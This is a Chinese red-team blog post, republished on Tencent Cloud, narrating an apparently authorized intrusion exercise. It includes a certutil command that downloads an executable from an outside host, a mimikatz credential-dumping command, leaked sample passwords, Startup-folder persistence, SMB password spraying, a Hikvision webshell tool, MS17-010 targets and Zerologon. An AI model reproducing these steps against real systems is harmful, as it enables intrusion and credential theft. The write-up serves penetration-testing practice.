前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >攻防|记某次极为顺畅的实战案例

攻防|记某次极为顺畅的实战案例

原创
作者头像
亿人安全
发布2024-02-22 17:24:05
990
发布2024-02-22 17:24:05
举报
文章被收录于专栏:红蓝对抗红蓝对抗

原文链接:

https://xz.aliyun.com/t/13557

真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。

金蝶云星空RCE

图片
图片

shell之后尝试上线(出网) certutil -urlcache -split -f?http://xx.xx.xx.xx/test.exe?c:\test.exe 这里exe的位置只是一个示例,正常都是在tmp目录下的 有CS的话,就上传frp

图片
图片

本机信息收集

上传mimikatz收集密码本 mimikatz收集密码 mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full"

图片
图片

get一个密码,乍一看还有域 administrator/@qweadmin5656 之后在翻取文件的地方,发现有个密码HAO&^&123

维权

这里因为是简单的市护网,没人应急,维权就把exe的木马文件放到启动目录下 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

内网横向

之后就是fscan的扫描 先简单的使用密码本进行横向扫描,针对445端口进行密码复用的爆破。 因为SMB密码和RDP的密码是一样的。并且SMB的爆破速度比RDP更快。 这里获取了大概五六个权限,就可以放开去扫了

图片
图片

内网中扫描到一些 海康威视综合安防管理平台 https://github.com/Tas9er/HikvisionIVMSGetShell?换上Gazila的shell 地址为https://xxx.xxx.xxx/abcd.jsp;js

图片
图片

一堆永恒之蓝,直接msf梭哈就行,但是命令执行多了容易崩

代码语言:javascript
复制
[+] 172.21.3x.3x MS17-010 (Windows Server 2008 R2 Enterprise 7601 Servic
e Pack 1)
[+] 172.21.3x.1x MS17-010 (Windows Server 2016 Standard 14393)
[+] 172.21.3x.x9 MS17-010 (Windows Server 2012 R2 Standard 9600)
[+] 172.21.1x9.2x7 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1x0.2x MS17-010 (Windows 7 Enterprise 7600)
[+] 172.21.1x9.6x MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1x0.1x0 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.1x0.1x6 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.1x3.2x5 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1x0.1x3 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.1x2.x34 MS17-010 (Windows 7 Enterprise 7600)
[+] 172.21.1x9.x28 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1x0.x63 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.3x.5x MS17-010 (Windows Server 2012 R2 Datacenter 9600)
[+] 172.21.1x9.x7 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1x0.x32 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.3x.x1 MS17-010 (Windows Server 2012 R2 Standard 9600)

数据库弱口令,比如root/root(mysql),sa/123456(mssql ),redis未授权按,大概十几个数据库,几十万数据,就不一一放截图了。

图片
图片

如上所见 基本上都是172段的机子,在某次RDP的时候发现一个双网卡机子,通192段和169.254段(突破网络限制1000分)

图片
图片

但是这里只梭哈了192段。 由于这个双网卡机子出网,所以就上了个frp,继续上传mimikatz查看密码本。这里过程重复上面的过程了基本上,就不重新描述了。 有意思的是在扫描的过程中看到了域控。zerologon直接getshell

图片
图片
图片
图片
图片
图片

加个域管理,收工。

图片
图片

回头看看这个靶标,拿下的基本上很顺利,并没有什么坑坑绕绕。基本上一直在重复扫描,收集信息,继续扫描的过程

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

网络通信

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

网络通信
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 金蝶云星空RCE
  • 本机信息收集
  • 维权
  • 内网横向
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright ? 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有?

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059?深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 | ?京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright ? 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论
http://www.vxiaotou.com